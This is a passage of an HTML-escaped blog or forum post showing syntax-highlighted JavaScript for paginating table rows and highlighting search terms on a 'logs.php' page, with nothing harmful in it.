#66ccff;"&gt;currentPage&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;&amp;lt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;pages&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;showPage&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;currentPage&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;1&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&amp;nbsp;&amp;nbsp;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;init&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;function()&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;rows&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;document&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;getElementById&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;tableName&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;).&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;rows&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;records&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;rows&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;length&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;-&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;1&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;pages&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;Math&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;ceil&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;records&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;/&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;itemsPerPage&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;inited&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;true&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;showPageNav&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;function(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;pagerName&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;positionId&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;if&amp;nbsp;(!&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;inited&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;alert&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"not&amp;nbsp;inited"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;return;&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;element&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;document&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;getElementById&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;positionId&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;pagerHtml&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'&amp;lt;span&amp;nbsp;onclick="'&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;pagerName&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'.prev();"&amp;nbsp;class="pg-normal"&amp;gt;&amp;nbsp;&amp;amp;#171&amp;nbsp;Prev&amp;nbsp;&amp;lt;/span&amp;gt;&amp;nbsp;|&amp;nbsp;'&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;for&amp;nbsp;(var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;page&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;1&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;page&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;&amp;lt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;pages&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;page&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;++)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;pagerHtml&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'&amp;lt;span&amp;nbsp;id="pg'&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;page&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'"&amp;nbsp;class="pg-normal"&amp;nbsp;onclick="'&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;pagerName&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'.showPage('&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;page&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;');"&amp;gt;'&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;page&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'&amp;lt;/span&amp;gt;&amp;nbsp;|&amp;nbsp;'&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;pagerHtml&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'&amp;lt;span&amp;nbsp;onclick="'&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;pagerName&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'.next();"&amp;nbsp;class="pg-normal"&amp;gt;&amp;nbsp;Next&amp;nbsp;»&amp;lt;/span&amp;gt;'&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&amp;nbsp;&amp;nbsp;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;element&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;innerHTML&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;pagerHtml&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;}&amp;nbsp;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: dodgerblue; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;[*]highlight.js [ optional ]&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;This to highlight specific words as its written at the top of logs.php page&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock phpcodeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;PHP Code:&lt;/div&gt;&lt;div class="body"&gt;&lt;div dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: #7ac07c;"&gt;function&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;doHighlight&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bodyText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;searchTerm&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightStartTag&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightEndTag&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&lt;br /&gt;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ffcccc;"&gt;//&amp;nbsp;the&amp;nbsp;highlightStartTag&amp;nbsp;and&amp;nbsp;highlightEndTag&amp;nbsp;parameters&amp;nbsp;are&amp;nbsp;optional&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;if&amp;nbsp;((!&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightStartTag&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;||&amp;nbsp;(!&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightEndTag&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;))&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightStartTag&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"&amp;lt;font&amp;nbsp;style='color:blue;&amp;nbsp;background-color:yellow;'&amp;gt;&amp;lt;b&amp;gt;"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightEndTag&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"&amp;lt;/font&amp;gt;&amp;lt;/b&amp;gt;"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;newText&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;""&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;-&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;1&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;lcSearchTerm&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;searchTerm&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;toLowerCase&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;();&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;lcBodyText&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bodyText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;toLowerCase&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;();&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;while&amp;nbsp;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bodyText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;length&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;0&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;lcBodyText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;indexOf&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;lcSearchTerm&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;1&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if&amp;nbsp;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;&amp;lt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;0&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;newText&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bodyText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bodyText&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;""&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&amp;nbsp;else&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ffcccc;"&gt;//&amp;nbsp;skip&amp;nbsp;anything&amp;nbsp;inside&amp;nbsp;an&amp;nbsp;HTML&amp;nbsp;tag&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;if&amp;nbsp;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bodyText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;lastIndexOf&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"&amp;gt;"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;&amp;gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bodyText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;lastIndexOf&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"&amp;lt;"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;))&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ffcccc;"&gt;//&amp;nbsp;skip&amp;nbsp;anything&amp;nbsp;inside&amp;nbsp;a&amp;nbsp;&amp;lt;script&amp;gt;&amp;nbsp;block&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;if&amp;nbsp;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;lcBodyText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;lastIndexOf&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"/script&amp;gt;"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;&amp;gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;lcBodyText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;lastIndexOf&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"&amp;lt;script"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;))&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;newText&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bodyText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;substring&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;0&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightStartTag&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bodyText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;substr&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;searchTerm&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;length&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightEndTag&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bodyText&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bodyText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;substr&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;searchTerm&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;length&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;lcBodyText&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bodyText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;toLowerCase&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;();&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;-&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;1&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;return&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;newText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;function&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightSearchTerms&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;searchText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;treatAsPhrase&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;warnOnFailure&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightStartTag&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightEndTag&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&lt;br /&gt;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;if&amp;nbsp;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;treatAsPhrase&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;searchArray&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;[&lt;/span&gt;&lt;span style="color: 